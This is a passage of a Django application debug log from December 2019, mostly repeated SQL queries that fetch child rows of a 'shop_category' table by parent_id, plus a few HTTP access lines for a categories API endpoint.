"shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 12:41:54,618 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 12:41:54,625 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 12:41:54,629 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 12:41:54,633 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 12:41:54,637 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 12:41:54,641 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 12:41:54,644 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 12:41:54,647 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 12:41:54,649 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 12:41:54,651 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 12:41:54,654 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 12:41:54,658 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 12:41:54,660 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 12:41:54,663 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 12:41:54,665 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 12:41:54,668 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 12:41:54,670 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 12:41:54,673 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 12:41:54,675 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 12:41:54,678 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 12:41:54,681 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 12:41:54,683 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 12:41:54] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 12:43:51] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 12:44:42,088 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 12:44:42,099 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 12:44:42,105 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 12:44:42,109 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 12:44:42,117 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 12:44:42,121 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 12:44:42,125 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 12:44:42,130 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 12:44:42,133 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 12:44:42,139 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 12:44:42,141 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 12:44:42,144 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 12:44:42,146 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 12:44:42,149 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 12:44:42,152 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 12:44:42,155 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 12:44:42,157 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 12:44:42,159 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 12:44:42,162 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 12:44:42,165 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 12:44:42,168 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 12:44:42,170 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 12:44:42,172 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 12:44:42,174 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 12:44:42,177 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 12:44:42,180 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 12:44:42,183 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 12:44:42,185 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 12:44:42,187 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 12:44:42,190 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 12:44:42,193 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 12:44:42,196 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 12:44:42,198 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 12:44:42,200 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 12:44:42,203 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 12:44:42,206 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 12:44:42,209 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 12:44:42,211 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 12:44:42,213 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 12:44:42,215 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 12:44:42,218 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 12:44:42,221 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 12:44:42,223 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 12:44:42,226 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 12:44:42,228 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" 